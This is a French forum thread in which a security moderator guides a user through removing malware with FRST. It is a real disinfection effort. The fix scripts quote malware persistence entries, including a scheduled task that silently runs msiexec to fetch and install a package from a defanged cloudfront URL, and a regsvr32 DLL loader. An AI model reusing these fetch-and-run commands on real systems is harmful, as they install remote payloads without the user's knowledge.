Google ne repond pas/Virus/probleme de mémoire
Fermé
David
-
4 juin 2017 à 12:00
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 4 juin 2017 à 14:37
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 4 juin 2017 à 14:37
A voir également:
- Google ne repond pas/Virus/probleme de mémoire
- Google maps satellite - Guide
- Dns google - Guide
- Google maps - Guide
- Google earth - Télécharger - 3D
- Google - Guide
5 réponses
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 662
4 juin 2017 à 12:02
4 juin 2017 à 12:02
Salut,
Déjà pour vérifier l'ordi :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Déjà pour vérifier l'ordi :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
http://pjjoint.malekal.com/files.php?id=20170604_c6r69j10e7
http://pjjoint.malekal.com/files.php?id=FRST_20170604_p6h10n12d15j8
http://pjjoint.malekal.com/files.php?id=20170604_x15k13s8x10n6
http://pjjoint.malekal.com/files.php?id=FRST_20170604_p6h10n12d15j8
http://pjjoint.malekal.com/files.php?id=20170604_x15k13s8x10n6
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 662
Modifié le 4 juin 2017 à 13:05
Modifié le 4 juin 2017 à 13:05
ouaip infecté,
Désinstalle
Java
IObit Uninstaller (sert à rien)
MEGAsync (utile?)
MyWinLocker
Nero (utile?)
WildTangent Games
WinPcap
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
Veuillez appuyer sur une touche pour continuer la désinfection...
Désinstalle
Java
IObit Uninstaller (sert à rien)
MEGAsync (utile?)
MyWinLocker
Nero (utile?)
WildTangent Games
WinPcap
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
S3 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [X]
S3 WsDrvInst; C:\Program Files (x86)\Wondershare\TunesGo\DriverInstall.exe [X]
S2 ZAMSvc; C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe /service [X]
C:\Program Files (x86)\Wondershare
HKU\S-1-5-21-1360819790-2735512560-2707594012-1009\...\Run: [L3CICPJAXRS4L5G] => C:\Program Files\LD1ZAKBUTF\LD1ZAKBUT.exe
HKU\S-1-5-21-1360819790-2735512560-2707594012-1009\...\Run: [7SFBL0S662ZR6AU] => C:\Program Files\3FOAB2O52X\3FOAB2O52.exe
HKU\S-1-5-21-1360819790-2735512560-2707594012-1009\...\Run: [9B4L9PQNELUAF54] => C:\Program Files\05NVCEZF12\05NVCEZF1.exe
HKU\S-1-5-21-1360819790-2735512560-2707594012-1009\...\Run: [WY8E6HGE0GQVJ94] => C:\Program Files\4R8RGSW2OK\4R8RGSW2O.exe
HKU\S-1-5-21-1360819790-2735512560-2707594012-1009\...\Run: [GG2QVQ8B1UMV8D3] => C:\Program Files\KZDQ8QUIV8\KZDQ8QUIV.exe
HKU\S-1-5-21-1360819790-2735512560-2707594012-1009\...\Run: [76YOJ5L209I07IZ] => C:\Program Files\835VIC9GD0\835VIC9GD.exe
HKU\S-1-5-21-1360819790-2735512560-2707594012-1009\...\Run: [O7MPVHI7VA585F4] => C:\Program Files\A755TC71GT\A755TC71G.exe
HKU\S-1-5-21-1360819790-2735512560-2707594012-1009\...\Run: [4YIVSJZP355OFRB] => C:\Program Files\U7EYTQK9Z9\U7EYTQK9Z.exe
HKU\S-1-5-21-1360819790-2735512560-2707594012-1009\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9773272 2017-05-19] (Piriform Ltd)
HKLM\...\Providers\x555jex0: C:\Program Files (x86)\Ferhkruboty Cache\local64spl.dll
IFEO\MRT.exe: [Debugger] C:\ProgramData\jcgjc\Gubed.exe -Yrrehs
ShellExecuteHooks: Pas de nom - {470A68EC-A5C5-11E6-BD46-64006A5CFC23} - C:\Users\David\AppData\Roaming\Zedisgroqch\Pergawehele.dll -> Pas de fichier
ShellExecuteHooks: Pas de nom - {2B7B7EEC-ABFF-11E6-8E22-64006A5CFC23} - C:\Users\David\AppData\Roaming\Pherhert\Zakusyhiluther.dll -> Pas de fichier
ShellExecuteHooks: Pas de nom - {19C0CCEC-45A3-11E7-B010-64006A5CFC23} - C:\Users\FISTERD\AppData\Roaming\Jenergearuraly\Shderied.dll -> Pas de fichier
S2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.2.3.2\WsAppService.exe [416768 2016-06-24] (Wondershare) [Fichier non signé]
C:\Program Files (x86)\Wondershare
R1 NetUtils2016; C:\WINDOWS\system32\drivers\NetUtils2016.sys [907160 2017-06-03] () <==== ATTENTION
2017-06-04 11:45 - 2017-06-04 11:48 - 00000000 ____D C:\Users\FISTERD\AppData\Roaming\ZHP
2017-06-04 11:45 - 2017-06-04 11:48 - 00000000 ____D C:\Users\FISTERD\AppData\Local\ZHP
2017-06-04 11:45 - 2017-06-04 11:45 - 00000906 _____ C:\Users\FISTERD\Desktop\ZHPDiag.lnk
2017-06-04 11:44 - 2017-06-04 11:45 - 02734592 _____ C:\Users\FISTERD\Downloads\ZHPDiag3.exe
2017-06-04 11:43 - 2017-06-04 11:43 - 00002395 _____ C:\Users\FISTERD\Desktop\Chromium.lnk
2017-06-04 11:43 - 2017-06-04 11:43 - 00000000 ____D C:\Users\FISTERD\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chromium
2017-06-04 11:43 - 2017-06-04 11:43 - 00000000 ____D C:\Users\FISTERD\AppData\Local\Chromium
2017-06-03 15:40 - 2017-06-03 20:55 - 00000000 ____D C:\Program Files (x86)\h6bZFOxzl7
2017-06-03 15:40 - 2017-06-03 18:45 - 00000000 ____D C:\Users\FISTERD\AppData\Roaming\Pevghtbuhers
2017-06-03 15:40 - 2017-06-03 15:40 - 00000000 ____D C:\Program Files (x86)\Fipoph Module
2017-06-03 14:57 - 2017-06-03 18:09 - 01130328 _____ (Google Inc.) C:\Users\FISTERD\Downloads\ChromeSetup.exe
2017-06-03 14:51 - 2017-06-03 14:51 - 00000000 ____D C:\Users\FISTERD\AppData\Roaming\NVIDIA
2017-06-03 14:45 - 2017-06-03 14:45 - 00003238 _____ C:\WINDOWS\System32\Tasks\{C3E91A44-F497-4995-9833-B44E67E86AE8}
2017-06-03 14:44 - 2017-06-03 14:44 - 00004186 _____ C:\WINDOWS\System32\Tasks\{66ABE58B-D100-5220-B27C-4924504DA56F}
2017-06-03 14:44 - 2017-06-03 14:44 - 00003884 _____ C:\WINDOWS\System32\Tasks\{0AE28E00-94E6-62B9-BCD5-D16125EB9276}
2017-06-03 14:44 - 2017-06-03 14:44 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
2017-06-03 14:44 - 2017-06-03 14:44 - 00000000 ____D C:\Users\Default User\AppData\Local\AdvinstAnalytics
2017-06-03 14:43 - 2017-06-03 16:00 - 00000000 ____D C:\Users\FISTERD\AppData\Local\Couserchwuwsh
2017-06-03 14:43 - 2017-06-03 14:43 - 00140800 _____ C:\Users\FISTERD\AppData\Local\installer.dat
2017-06-03 14:43 - 2017-06-03 14:43 - 00011568 _____ C:\Users\FISTERD\AppData\Local\InstallationConfiguration.xml
2017-06-03 14:43 - 2017-06-03 14:43 - 00000000 ____D C:\Users\FISTERD\AppData\LocalLow\IObit
2017-06-03 14:42 - 2017-06-04 12:18 - 00624640 _____ C:\WINDOWS\system32\NetUtils2016.dll
2017-06-03 14:42 - 2017-06-03 18:14 - 00000000 ____D C:\Program Files (x86)\51zwgbcbrfz
2017-06-03 14:42 - 2017-06-03 14:43 - 00907160 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys
2017-06-03 14:42 - 2017-06-03 14:42 - 00907160 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys.0114350b
2017-06-03 14:42 - 2017-06-03 14:42 - 00000000 ____D C:\WINDOWS\system32\sstmp
2017-06-03 14:41 - 2017-06-03 14:41 - 30533688 _____ C:\Users\FISTERD\Downloads\Microsoft Toolkit 2.5.3 [1].exe
2017-06-03 14:40 - 2017-06-03 14:40 - 00000000 ____D C:\Users\FISTERD\AppData\Local\CrashRpt
2017-06-03 14:39 - 2017-06-03 15:14 - 00000000 ____D C:\Users\FISTERD\AppData\Roaming\Jenergearuraly
2017-06-03 14:39 - 2017-06-03 14:40 - 00000000 ____D C:\Users\FISTERD\AppData\Local\Lasprabsh
2017-06-03 14:39 - 2017-06-03 14:39 - 00006154 _____ C:\WINDOWS\System32\Tasks\Ferhkruboty Cache
2017-05-28 19:19 - 2017-05-28 19:20 - 03105479 _____ C:\Users\FISTERD\Downloads\Overwatch-Keygen.rar
2017-06-03 20:55 - 2016-11-24 16:47 - 00000000 ____D C:\Users\David\AppData\Local\Shecerentreward
Task: {0B1D9528-A3DF-4A8D-A618-72149D1E040B} - \Berlletherserle Server -> Pas de fichier <==== ATTENTION
Task: {0C570BE3-06EA-46D6-8C36-912193693108} - System32\Tasks\Ferhkruboty Cache => C:\Program Files (x86)\Hebertreitisp\yaupdcache.exe
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [7757040 2017-04-06] (TeamViewer GmbH)
S2 UnsignedThemes; C:\WINDOWS\unsignedthemes.exe [13824 2013-09-23] (The Within Network, LLC) [Fichier non signé]
Task: {530A9DD2-1C41-4277-AEE9-2F849F14D1A7} - System32\Tasks\{C3E91A44-F497-4995-9833-B44E67E86AE8} => pcalua.exe -a C:\WINDOWS\3b2a7ec3014dc65a73373dd4dd3d6f2c.exe
Task: {6C6E587D-E1A0-4C8F-818D-70DDA8CBA4C4} - System32\Tasks\{026FD593-F5CB-4F40-9B5F-205AC505A38A} => pcalua.exe -a "C:\Program Files (x86)\Wondershare\TunesGo\unins000.exe" -c /WAF
Task: {C61F58E0-7257-427C-AF43-A2E56E02D510} - System32\Tasks\{0AE28E00-94E6-62B9-BCD5-D16125EB9276} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\3b418676\e5f73bc.dll" <==== ATTENTION
Task: {DC7C502F-AE7D-48E9-BFC8-07F8A614AC71} - System32\Tasks\Microsoft\Windows\DeviceSettings\Prifeied => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=ST2000DM001-1CH164_Z1E3HDMEXXXXZ1E3HDME&d=20170603 /q <==== ATTENTION
AlternateDataStreams: C:\WINDOWS\system32\drivers:ucdrv-x64.sys [80850]
AlternateDataStreams: C:\WINDOWS\system32\drivers:x64 [364744]
AlternateDataStreams: C:\WINDOWS\system32\drivers:x86 [1176354]
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
Veuillez appuyer sur une touche pour continuer la désinfection...
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 662
>
David
4 juin 2017 à 13:07
4 juin 2017 à 13:07
Tu as des rapports à donner...
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 662
>
David
Modifié le 4 juin 2017 à 13:59
Modifié le 4 juin 2017 à 13:59
Si tu veux résoudre les problèmes, suis la procédure en ENTIER.
Tu as des rapports à donner...
Suis la procédure EN ENTIER.
Tu as des rapports à donner...
Suis la procédure EN ENTIER.
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 662
4 juin 2017 à 14:12
4 juin 2017 à 14:12
ok pour le rapport de correction
A la fin du 4) il est écrit :
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
A la fin du 4) il est écrit :
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 662
>
David
4 juin 2017 à 14:21
4 juin 2017 à 14:21
Les rapports sont incomplets, tu n'as pas laissé le scan FRST aller jusqu'au bout.
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 662
Modifié le 4 juin 2017 à 14:38
Modifié le 4 juin 2017 à 14:38
T'as même chopper des Trojans...
Tes mots de passe ont dû être volés.
Vas falloir arreter de télécharger des cracks, ça ne te réussi pas.
Désinstalle Clean Ram
sert à rien.
Pareil pour teamviewer si tu ne l'as pas installé volontairement.
On tente encore ce nettoyage, sinon le mieux c'est de réinitialiser Windows pour repartir sur de bonne base..
=> Comment réinitialiser Windows 10.
~~
1/
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2/
Réinstalle proprement Google Chrome, en suivant exactement cette procédure : Réparer et réinstaller proprement Google Chrome
Veuillez appuyer sur une touche pour continuer la désinfection...
Tes mots de passe ont dû être volés.
Vas falloir arreter de télécharger des cracks, ça ne te réussi pas.
Désinstalle Clean Ram
sert à rien.
Pareil pour teamviewer si tu ne l'as pas installé volontairement.
On tente encore ce nettoyage, sinon le mieux c'est de réinitialiser Windows pour repartir sur de bonne base..
=> Comment réinitialiser Windows 10.
~~
1/
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
2017-06-03 14:42 - 2017-06-04 12:59 - 00907160 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys
Startup: C:\Users\David\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PhLFKaHCQRKWJGeY.cmd.lnk [2017-01-26]
S2 Gsoshvanoing; C:\Program Files (x86)\Cerotain\FerhusSys.dll [X]
Task: {CAFFF765-0965-4D40-960F-E5DD05011637} - \Safer-Networking\Spybot - Search and Destroy\Check for updates -> Pas de fichier <==== ATTENTION
HKU\S-1-5-21-1360819790-2735512560-2707594012-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06042017135939652\...\Run: [VCR0JX3YD9] => "C:\Users\David\AppData\Local\Temp\3O6DHY6Y91\caster.exe" <===== ATTENTION
HKU\S-1-5-21-1360819790-2735512560-2707594012-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06042017135939652\...\Run: [5TPANJ3P8A] => "C:\Users\David\AppData\Local\Temp\FQPKGXAQLA.exe" <===== ATTENTION
HKU\S-1-5-21-1360819790-2735512560-2707594012-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06042017135939652\...\Run: [1QGUCEXYHD] => "C:\Program Files\9VSNZJM3HK\9VSNZJM3H.exe"
HKU\S-1-5-21-1360819790-2735512560-2707594012-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06042017135939652\...\Run: [BZUW59ZTJH] => "C:\Program Files (x86)\DPower\W63ACVV2ON.exe" <===== ATTENTION
HKU\S-1-5-21-1360819790-2735512560-2707594012-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06042017135939652\...\Run: [Desktop Windows Manager] => C:\Users\David\AppData\Roaming\Windows Desktop Manager\dvvm.exe
HKU\S-1-5-21-1360819790-2735512560-2707594012-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06042017135939652\...\Run: [Dektop Windows Manager] => C:\Users\David\AppData\Roaming\Windows Desktop Manager\dvvm.exe
Task: {1E057481-2A1A-4E6E-A145-571818B96273} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
2017-06-04 13:19 - 2017-06-04 14:06 - 00000040 _____ C:\Program Files (x86)\settings.dat
2017-06-04 13:19 - 2017-06-04 13:19 - 00000000 ____D C:\Program Files (x86)\reports
2017-06-04 13:02 - 2017-06-04 13:02 - 00624640 _____ C:\WINDOWS\system32\NetUtils2016.dll
C:\Users\David\AppData\Roaming\Windows Desktop Manager
C:\Program Files (x86)\UCBrowser
HKU\S-1-5-21-1360819790-2735512560-2707594012-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06042017140743850\...\Run: [VCR0JX3YD9] => "C:\Users\David\AppData\Local\Temp\3O6DHY6Y91\caster.exe" <===== ATTENTION
HKU\S-1-5-21-1360819790-2735512560-2707594012-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06042017140743850\...\Run: [5TPANJ3P8A] => "C:\Users\David\AppData\Local\Temp\FQPKGXAQLA.exe" <===== ATTENTION
HKU\S-1-5-21-1360819790-2735512560-2707594012-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06042017140743850\...\Run: [1QGUCEXYHD] => "C:\Program Files\9VSNZJM3HK\9VSNZJM3H.exe"
HKU\S-1-5-21-1360819790-2735512560-2707594012-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06042017140743850\...\Run: [BZUW59ZTJH] => "C:\Program Files (x86)\DPower\W63ACVV2ON.exe" <===== ATTENTION
HKU\S-1-5-21-1360819790-2735512560-2707594012-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06042017140743850\...\Run: [Desktop Windows Manager] => C:\Users\David\AppData\Roaming\Windows Desktop Manager\dvvm.exe
HKU\S-1-5-21-1360819790-2735512560-2707594012-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06042017140743850\...\Run: [Dektop Windows Manager] => C:\Users\David\AppData\Roaming\Windows Desktop Manager\dvvm.exe
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2/
Réinstalle proprement Google Chrome, en suivant exactement cette procédure : Réparer et réinstaller proprement Google Chrome
Veuillez appuyer sur une touche pour continuer la désinfection...
Modifié le 4 juin 2017 à 12:42
http://pjjoint.malekal.com/files.php?id=FRST_20170604_p6h10n12d15j8
http://pjjoint.malekal.com/files.php?id=20170604_x15k13s8x10n6
ce qui est étrange c'est que ce problème n'affecte pas Microsoft Edge